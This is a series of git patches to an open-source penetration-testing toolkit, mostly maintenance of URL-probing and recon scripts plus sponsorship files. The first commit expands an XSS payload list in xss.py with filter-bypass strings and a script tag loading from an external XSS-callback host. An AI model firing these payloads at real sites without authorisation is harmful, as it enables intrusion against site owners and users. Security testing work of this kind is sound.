From 5873a1b601b63232233746360dd6f6a7642a661e Mon Sep 17 00:00:00 2001
From: Gwen <g@10degres.net>
Date: Fri, 29 May 2020 19:17:24 +0200
Subject: [PATCH 01/11] new pl

---
 xss.py | 14 ++++++++++----
 1 file changed, 10 insertions(+), 4 deletions(-)

diff --git a/xss.py b/xss.py
index eb03c80..d45f30f 100755
--- a/xss.py
+++ b/xss.py
@@ -296,12 +296,18 @@ def realDoTest( t_params ):
 # source: https://twitter.com/brutelogic/status/1138805808328839170
 if not n_payloads:
     t_payloads = [
-        '\'"--><svg onload=prompt(1)>',
+        '\'"--><sVg onload=prompt(1)>',
         '"autofocus onfocus=prompt(1)//',
-        '\'"--></script><script>prompt(1)</script>',
-        "'-prompt(1)-'",
+        '\'"--><a autofocus onfocus=prompt(1) href=?>.',
+        '\'"--></sCrIpt><sCRIpt>prompt(1)</SCript>',
+        '\'"--><svG><scRIpt href=data:,prompt(1) />',
+        '"-prompt(1)-"',
         "\\'-prompt(1)//",
-        'javascript:prompt(1)',
+        "'\")];*/prompt(1);/*",
+        '" onload=prompt(1)>',
+        '\'"--><SCripT src="//glc.xss.ht">',
+        '\'"--><sCRipt src=javascript:[1].find(prompt)>',
+        "'\"--><x v-on=_c.constructor('prompt(1)')()>",
     ]
 n_payloads = len(t_payloads)
 

From 1cdc69fb5f0874965dda65c0e0b52023f21c0999 Mon Sep 17 00:00:00 2001
From: Gwen <g@10degres.net>
Date: Fri, 29 May 2020 19:23:01 +0200
Subject: [PATCH 02/11] new pl

---
 xss.py | 1 -
 1 file changed, 1 deletion(-)

diff --git a/xss.py b/xss.py
index d45f30f..3173f25 100755
--- a/xss.py
+++ b/xss.py
@@ -297,7 +297,6 @@ def realDoTest( t_params ):
 if not n_payloads:
     t_payloads = [
         '\'"--><sVg onload=prompt(1)>',
-        '"autofocus onfocus=prompt(1)//',
         '\'"--><a autofocus onfocus=prompt(1) href=?>.',
         '\'"--></sCrIpt><sCRIpt>prompt(1)</SCript>',
         '\'"--><svG><scRIpt href=data:,prompt(1) />',

From 9ccf25685679a166fdb0ead826389d16832b68e6 Mon Sep 17 00:00:00 2001
From: Gwen <g@10degres.net>
Date: Wed, 3 Jun 2020 21:44:44 +0200
Subject: [PATCH 03/11] added title

---
 quickhits.py | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/quickhits.py b/quickhits.py
index b332791..6bec29b 100755
--- a/quickhits.py
+++ b/quickhits.py
@@ -41,7 +41,7 @@ def banner():
 
 
 startTime = datetime.now()
-
+title_regexp = re.compile('<title>(.*?)</title>', re.IGNORECASE|re.DOTALL)
 
 def testURL( url ):
     time.sleep( 0.3 )
@@ -89,7 +89,10 @@ def testURL( url ):
     else:
         content_type = '-'
 
-    output = '%sC=%d\t\tL=%d\t\tT=%s\n' %  (url.ljust(t_multiproc['u_max_length']),r.status_code,len(r.text),content_type)
+    match = title_regexp.search( r.text )
+    title = match.group(1) if match else '-'
+
+    output = '%sS=%d\t\tL=%d\t\tC=%s\t\tT=%s\n' %  (url.ljust(t_multiproc['u_max_length']),r.status_code,len(r.text),content_type,title)
     # sys.stdout.write( '%s' % output )
 
     fp = open( t_multiproc['f_output'], 'a+' )

From aa33eefb940b290bab9de40c6b64892a7208cb5f Mon Sep 17 00:00:00 2001
From: Gwen <g@10degres.net>
Date: Wed, 3 Jun 2020 21:48:25 +0200
Subject: [PATCH 04/11] added title

---
 quickhits.py | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/quickhits.py b/quickhits.py
index 6bec29b..465f840 100755
--- a/quickhits.py
+++ b/quickhits.py
@@ -89,6 +89,9 @@ def testURL( url ):
     else:
         content_type = '-'
 
+    if len(url) > 1:
+        url = url.strip('_')
+
     match = title_regexp.search( r.text )
     title = match.group(1) if match else '-'
 
@@ -110,6 +113,9 @@ def saveFile( d_output, t_urlparse, r ):
     # filename = t_urlparse.path.strip('/')
     filename = t_urlparse.path.strip('/') + '_' + t_urlparse.query
     filename = re.sub( '[^0-9a-zA-Z_\-\.]', '_', filename )
+    if len(filename) > 1:
+        filename = filename.strip('_')
+
     d_output = d_output +  '/' + t_urlparse.netloc
     f_output = d_output + '/' + filename
     # print(f_output)

From 274c24ee3598e132b209ed5ba630ceb962a5c7c4 Mon Sep 17 00:00:00 2001
From: Gwen <g@10degres.net>
Date: Wed, 3 Jun 2020 21:55:06 +0200
Subject: [PATCH 05/11] added title

---
 quickhits.py | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/quickhits.py b/quickhits.py
index 465f840..cd86f14 100755
--- a/quickhits.py
+++ b/quickhits.py
@@ -95,7 +95,12 @@ def testURL( url ):
     match = title_regexp.search( r.text )
     title = match.group(1) if match else '-'
 
-    output = '%sS=%d\t\tL=%d\t\tC=%s\t\tT=%s\n' %  (url.ljust(t_multiproc['u_max_length']),r.status_code,len(r.text),content_type,title)
+    ljust = 100
+    while ljust < len(url):
+        ljust = ljust + 50
+
+    output = '%sS=%d\t\tL=%d\t\tC=%s\t\tT=%s\n' %  (url.ljust(ljust),r.status_code,len(r.text),content_type,title)
+    # output = '%sS=%d\t\tL=%d\t\tC=%s\t\tT=%s\n' %  (url.ljust(t_multiproc['u_max_length']),r.status_code,len(r.text),content_type,title)
     # sys.stdout.write( '%s' % output )
 
     fp = open( t_multiproc['f_output'], 'a+' )

From a6dee397546642e31be0f3d0255d9f6ec2e6e042 Mon Sep 17 00:00:00 2001
From: Gwen <g@10degres.net>
Date: Wed, 3 Jun 2020 21:56:05 +0200
Subject: [PATCH 06/11] added title

---
 quickhits.py | 1 +
 1 file changed, 1 insertion(+)

diff --git a/quickhits.py b/quickhits.py
index cd86f14..cee86ab 100755
--- a/quickhits.py
+++ b/quickhits.py
@@ -98,6 +98,7 @@ def testURL( url ):
     ljust = 100
     while ljust < len(url):
         ljust = ljust + 50
+    ljust = ljust + 2
 
     output = '%sS=%d\t\tL=%d\t\tC=%s\t\tT=%s\n' %  (url.ljust(ljust),r.status_code,len(r.text),content_type,title)
     # output = '%sS=%d\t\tL=%d\t\tC=%s\t\tT=%s\n' %  (url.ljust(t_multiproc['u_max_length']),r.status_code,len(r.text),content_type,title)

From 017b2fca009d81f644e2705f26fb8b0728fcf999 Mon Sep 17 00:00:00 2001
From: Gwen <g@10degres.net>
Date: Thu, 4 Jun 2020 09:48:25 +0200
Subject: [PATCH 07/11] added title

---
 quickhits.py | 13 +++++++++----
 1 file changed, 9 insertions(+), 4 deletions(-)

diff --git a/quickhits.py b/quickhits.py
index cee86ab..555a508 100755
--- a/quickhits.py
+++ b/quickhits.py
@@ -139,9 +139,14 @@ def saveFile( d_output, t_urlparse, r ):
 
     # print(s_headers)
     content = s_headers + "\n" + r.text
-    fp = open( f_output, 'w' )
-    fp.write( content )
-    fp.close()
+
+    try:
+        fp = open( f_output, 'w' )
+        fp.write( content )
+        fp.close()
+    except Exception as e:
+        sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
+        return
 
 
 # disable "InsecureRequestWarning: Unverified HTTPS request is being made."
@@ -308,7 +313,7 @@ def saveFile( d_output, t_urlparse, r ):
 # exit()
 
 random.shuffle(t_totest)
-random.shuffle(t_totest)
+# random.shuffle(t_totest)
 
 t_exceptions = {}
 t_multiproc = {

From 6ccabe973f879d3ed90a1a62ef2263f47d477bbd Mon Sep 17 00:00:00 2001
From: Gwen <g@10degres.net>
Date: Fri, 26 Jun 2020 15:13:17 +0200
Subject: [PATCH 08/11] github sponsor

---
 bbhost.sh          |   2 +-
 github-sponsor.jpg | Bin 0 -> 4305 bytes
 google-search.py   |   9 +++++----
 quickhits.py       |   8 ++++----
 smuggler.py        |   2 +-
 5 files changed, 11 insertions(+), 10 deletions(-)
 create mode 100644 github-sponsor.jpg

diff --git a/bbhost.sh b/bbhost.sh
index a0a5d4c..d269c51 100755
--- a/bbhost.sh
+++ b/bbhost.sh
@@ -14,7 +14,7 @@ else
 fi
 #echo $output
 
-parallel -j 10 "host " :::: $input | tee -a $output
+parallel -j 20 "host " :::: $input | tee -a $output
 exit;
 
 for h in $(cat $input) ; do
diff --git a/github-sponsor.jpg b/github-sponsor.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..f733e3326417bb79d42baaa65a3f5cbf9484f7b8
GIT binary patch
literal 4305
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
O`xjw&AnlY6Kl?W{neJl%

literal 0
HcmV?d00001

diff --git a/google-search.py b/google-search.py
index c5eac7e..ab9c0b3 100755
--- a/google-search.py
+++ b/google-search.py
@@ -12,12 +12,12 @@
 
 def banner():
 	print("""
-                         _                                _                       
-  __ _  ___   ___   __ _| | ___   ___  ___  __ _ _ __ ___| |__        _ __  _   _ 
+                         _                                _
+  __ _  ___   ___   __ _| | ___   ___  ___  __ _ _ __ ___| |__        _ __  _   _
  / _` |/ _ \ / _ \ / _` | |/ _ \ / __|/ _ \/ _` | '__/ __| '_ \      | '_ \| | | |
 | (_| | (_) | (_) | (_| | |  __/ \__ \  __/ (_| | | | (__| | | |  _  | |_) | |_| |
  \__, |\___/ \___/ \__, |_|\___| |___/\___|\__,_|_|  \___|_| |_| (_) | .__/ \__, |
- |___/             |___/                                             |_|    |___/ 
+ |___/             |___/                                             |_|    |___/
 
                         by @gwendallecoguic
 
@@ -86,6 +86,7 @@ def banner():
 else:
     urldecode = False
 
+# print(fb_cookie)
 
 def doMultiSearch( term, numbers_only, urldecode, page ):
     zero_result = 0
@@ -106,7 +107,7 @@ def doMultiSearch( term, numbers_only, urldecode, page ):
                     print( s_results[i]['url'] )
     else:
         for i in range(page,end_page):
-            page_history[i] = 0 
+            page_history[i] = 0
 
 for term in t_terms:
     page_history = {}
diff --git a/quickhits.py b/quickhits.py
index 555a508..ed54682 100755
--- a/quickhits.py
+++ b/quickhits.py
@@ -89,8 +89,8 @@ def testURL( url ):
     else:
         content_type = '-'
 
-    if len(url) > 1:
-        url = url.strip('_')
+    # if len(url) > 1:
+    #     url = url.strip('_')
 
     match = title_regexp.search( r.text )
     title = match.group(1) if match else '-'
@@ -119,8 +119,8 @@ def saveFile( d_output, t_urlparse, r ):
     # filename = t_urlparse.path.strip('/')
     filename = t_urlparse.path.strip('/') + '_' + t_urlparse.query
     filename = re.sub( '[^0-9a-zA-Z_\-\.]', '_', filename )
-    if len(filename) > 1:
-        filename = filename.strip('_')
+    # if len(filename) > 1:
+    #     filename = filename.strip('_')
 
     d_output = d_output +  '/' + t_urlparse.netloc
     f_output = d_output + '/' + filename
diff --git a/smuggler.py b/smuggler.py
index 1b462ca..e355c18 100755
--- a/smuggler.py
+++ b/smuggler.py
@@ -502,7 +502,7 @@ def send( self ):
         sock.settimeout( _timeout )
 
         try:
-            sock.connect( (netloc, port) )
+            sock.connect( (netloc, int(port)) )
         except Exception as e:
             sys.stdout.write( "%s[-] send (connect) - error occurred: %s (%s)%s\n" % (fg('red'),e,self.url,attr(0)) )
             return False

From 12cc95c6cc2d4c22660fdfba9068831cb2d6da9f Mon Sep 17 00:00:00 2001
From: Gwen <g@10degres.net>
Date: Fri, 26 Jun 2020 15:22:34 +0200
Subject: [PATCH 09/11] github sponsor

---
 README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/README.md b/README.md
index f229a57..2ef7dac 100755
--- a/README.md
+++ b/README.md
@@ -5,7 +5,7 @@ I don't believe in licenses.
 You can do whatever you want with this program.  
 
 However, there is a way to support :)  
-<a href="https://www.buymeacoffee.com/gwendallecoguic" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/default-yellow.png" alt="Buy Me A Coffee" style="height: 51px !important;width: 217px !important;" width="217" ></a>
+<a href="https://github.com/sponsors/gwen001" title="Sponsor gwen001"><img src="https://raw.githubusercontent.com/gwen001/pentest-tools/master/github-sponsor.jpg" alt="Sponsor gwen001" title="Sponsor gwen001"></a>
 
 
 ### arpa.sh

From f75f239e3c1bb7a164c3488ed0ba844389676cc2 Mon Sep 17 00:00:00 2001
From: Gwen <g@10degres.net>
Date: Fri, 26 Jun 2020 15:23:32 +0200
Subject: [PATCH 10/11] github sponsor

---
 .github/FUNDING.yml | 12 ++++++++++++
 1 file changed, 12 insertions(+)
 create mode 100644 .github/FUNDING.yml

diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml
new file mode 100644
index 0000000..eb7b65a
--- /dev/null
+++ b/.github/FUNDING.yml
@@ -0,0 +1,12 @@
+# These are supported funding model platforms
+
+github: [gwen001]
+patreon: # Replace with a single Patreon username
+open_collective: # Replace with a single Open Collective username
+ko_fi: # Replace with a single Ko-fi username
+tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
+community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
+liberapay: # Replace with a single Liberapay username
+issuehunt: # Replace with a single IssueHunt username
+otechie: # Replace with a single Otechie username
+custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2']

From a9af5c99ccf5fa997eb7a6ac0543a7d658c6173b Mon Sep 17 00:00:00 2001
From: Gwen <g@10degres.net>
Date: Tue, 28 Jul 2020 08:21:38 +0200
Subject: [PATCH 11/11] fix goop regexp

---
 extract-endpoints.php | 62 +++++++++++++++++++++---------------------
 favicon-hashtrick.py  | 22 ++++++++++-----
 goop/__init__.py      |  1 +
 goop/goop.py          | 63 +++++++++++++++++++++++++++++++++++++++++++
 quickhits.py          |  2 +-
 5 files changed, 112 insertions(+), 38 deletions(-)
 create mode 100644 goop/__init__.py
 create mode 100644 goop/goop.py

diff --git a/extract-endpoints.php b/extract-endpoints.php
index 9a54993..e82f50b 100755
--- a/extract-endpoints.php
+++ b/extract-endpoints.php
@@ -360,9 +360,9 @@ function usage( $err=null ) {
 	} else {
 		$buffer = file_get_contents( $s );
 	}
-	
+
 	ob_start();
-	
+
 	if( $_mode == MODE_KEYWORD )
 	{
 		$ss = escapeshellcmd( $s );
@@ -373,14 +373,14 @@ function usage( $err=null ) {
 		echo $cmd."\n";
 		exec( $cmd, $output );
 		$n_sensitive = printColoredGrep( $_keywords_sensitive_regexp, implode("\n",$output), 1 );
-		
+
 		if( $_keywords_insensitive_regexp != $_keywords_sensitive_regexp ) {
 			$output = null;
 			$cmd = 'egrep -i -n "'.$_keywords_insensitive_regexp.'" "'.$ss.'"';
 			exec( $cmd, $output );
 			$n_insensitive = printColoredGrep( $_keywords_insensitive_regexp, implode("\n",$output), 0 );
 		}
-		
+
 		$n_total = $n_sensitive + $n_insensitive;
 		if( $_verbose < 2 ) {
 			echo $n_total." keywords found!\n";
@@ -415,8 +415,8 @@ function usage( $err=null ) {
 		clean( $t_final );
 		$n_final = count($t_final);
 		$n_possible = count($t_possible);
-		
-		if( $n_final ) { 
+
+		if( $n_final ) {
 			$t_final = array_unique( $t_final );
 			$n_final = count( $t_final );
 			foreach( $t_final as $u ) {
@@ -437,14 +437,14 @@ function usage( $err=null ) {
 		if( $_verbose < 2 ) {
 			echo $n_final." urls found!\n";
 		}
-		
+
 		if( $n_possible && $_verbose<2 ) {
 			Utils::_println( str_repeat('-',100), 'light_grey' );
 			$t_possible = array_unique( $t_possible );
 			Utils::_println( implode( "\n",$t_possible), 'light_grey' );
 			Utils::_println( $n_possible." possible...", 'light_grey' );
 		}
-		
+
 		$n_total = $n_possible + $n_final;
 	}
 
@@ -475,9 +475,9 @@ function testUrl( $url, $follow_location )
 	curl_setopt( $c, CURLOPT_FOLLOWLOCATION, $follow_location );
 	curl_setopt( $c, CURLOPT_RETURNTRANSFER, true );
 	$r = curl_exec( $c );
-	
+
 	$t_info = curl_getinfo( $c );
-	
+
 	return $t_info['http_code'];
 }
 
@@ -488,13 +488,13 @@ function printColoredGrep( $regexp, $str, $case_sensitive )
 	//$l = strlen( $str );
 	//$m = preg_match_all( '#'.$regexp.'#i', $str, $matches, PREG_OFFSET_CAPTURE );
 	//var_dump( $matches );
-	
+
 	if( $case_sensitive ) {
 		$flag = '';
 	} else {
 		$flag = 'i';
 	}
-	
+
 	$colored = preg_replace( '#'.$regexp.'#'.$flag, "\033[0;32m".'\\1'."\033[0m", $str, -1, $cnt );
 	if( $cnt ) {
 		echo $colored."\n";
@@ -515,7 +515,7 @@ function printColoredGrep( $regexp, $str, $case_sensitive )
 			//break;
 		}
 	}
-	
+
 	$s3 = substr( $str, $p );
 	Utils::_print( $s3, 'white' );*/
 	return $cnt;
@@ -528,7 +528,7 @@ function run( $buffer )
 	//var_dump( $_regexp );
 
 	$t_all = [];
-	
+
 	foreach( $_regexp as $r ) {
 		$m = preg_match_all( $r.'i', $buffer, $matches );
 		//var_dump( $matches );
@@ -537,7 +537,7 @@ function run( $buffer )
 			$t_all = array_merge( $t_all, $matches[1] );
 		}
 	}
-	
+
 	$t_exclude_extension = [ ];
 	$t_exclude_domain = [ ];
 	$t_exclude_scheme = [ 'javascript', 'mailto', 'data', 'about', 'file' ];
@@ -552,13 +552,13 @@ function run( $buffer )
 	{
 		//var_dump($url);
 		//$url = urldecode( $url );
-		
+
 		$test = preg_replace( '#[^0-9a-zA-Z]#', '', $url );
 		if( $test == '' ) {
 			unset( $t_all[$k] );
 			continue;
 		}
-	 	
+
 		$parse = parse_url( $url );
 		//var_dump($parse);
 		if( !$parse ) {
@@ -566,7 +566,7 @@ function run( $buffer )
 			$t_possible[] = $url;
 			continue;
 		}
-		
+
 		foreach( $t_exclude_string as $s ) {
 			if( strstr($url,$s) ) {
 				unset( $t_all[$k] );
@@ -574,7 +574,7 @@ function run( $buffer )
 				continue;
 			}
 		}
-		
+
 		foreach( $t_exclude_possible as $s ) {
 			if( strstr($url,$s) ) {
 				unset( $t_all[$k] );
@@ -582,37 +582,37 @@ function run( $buffer )
 				continue;
 			}
 		}
-		
+
 		if( isset($parse['scheme']) && in_array($parse['scheme'],$t_exclude_scheme) ) {
 			unset( $t_all[$k] );
 			$t_possible[] = $url;
 			continue;
 		}
-		
+
 		if( isset($parse['path']) && is_array($_ignore) && count($_ignore) ) {
 			$p = strrpos( $parse['path'], '.' );
 			if( $p !== false ) {
-				$ext = substr( $parse['path'], $p+1 );
+                $ext = substr( $parse['path'], $p+1 );
 				if( in_array($ext,$_ignore) ) {
 					unset( $t_all[$k] );
 					continue;
 				}
 			}
 		}
-		
+
 		if( $url[0] == '#' ) {
 			unset( $t_all[$k] );
 			$t_possible[] = $url;
 			continue;
 		}
-		
+
 		if( isset($parse['path']) )
 		{
 			if( strstr($parse['path'],' ') !== false ) {
 				$tmp = explode( ' ', $parse['path'] );
 				$parse['path'] = $tmp[0];
 			}
-			
+
 			$kk = preg_replace('|'.$_url_chars.'|i','',$parse['path']);
 			if( strlen($kk) != 0 ) {
 				unset( $t_all[$k] );
@@ -621,7 +621,7 @@ function run( $buffer )
 			}
 		}
 	}
-	
+
 	//var_dump($t_all);
 	return [$t_all,$t_possible];
 }
@@ -630,16 +630,16 @@ function run( $buffer )
 function clean( &$t_urls )
 {
 	global $_scheme, $_host, $_ignore;
-	
+
 	$scheme = $host = '';
-	
+
 	foreach( $t_urls as &$u )
 	{
 		//var_dump( $u );
 		$scheme = $host = '';
 		$parse = parse_url( $u );
 		//var_dump( $parse );
-		
+
 		if( isset($parse['host']) ) {
 			$host = $parse['host'];
 		} elseif( $_host ) {
@@ -647,7 +647,7 @@ function clean( &$t_urls )
 			$u = ltrim( $u, '/' );
 			$u = $host . '/' . $u;
 		}
-		
+
 		if( isset($parse['scheme']) && $parse['scheme'] != NULL ) {
 			$scheme = $parse['scheme'];
 		} elseif( $host ) {
@@ -655,7 +655,7 @@ function clean( &$t_urls )
 			$u = ltrim( $u, '/' );
 			$u = $scheme . '://' . $u;
 		}
-		
+
 		if( strstr($u,' ') !== false ) {
 			$tmp = explode( ' ', $u );
 			$u = $tmp[0];
diff --git a/favicon-hashtrick.py b/favicon-hashtrick.py
index 112b695..ce606d0 100755
--- a/favicon-hashtrick.py
+++ b/favicon-hashtrick.py
@@ -15,6 +15,11 @@
 from colored import fg, bg, attr
 
 
+# disable "InsecureRequestWarning: Unverified HTTPS request is being made."
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+
 def banner():
 	print("""
   __             _                    _               _     _        _      _
@@ -29,8 +34,6 @@ def banner():
 """)
 	pass
 
-banner()
-
 
 def faviconHash( data, web ):
 	if web:
@@ -53,6 +56,9 @@ def faviconHash( data, web ):
 parser.parse_args()
 args = parser.parse_args()
 
+if not args.silent:
+    banner()
+
 if args.values:
 	t_values = args.values.split(',')
 else:
@@ -77,10 +83,14 @@ def faviconHash( data, web ):
 	web_src = False
 
 if args.favurl:
-	favsource = args.favurl
-	r = requests.get( favsource )
-	data = r.content
-	web_src = True
+    favsource = args.favurl
+    try:
+        r = requests.get( favsource, timeout=3, verify=False )
+    except Exception as e:
+        sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
+        exit()
+    data = r.content
+    web_src = True
 
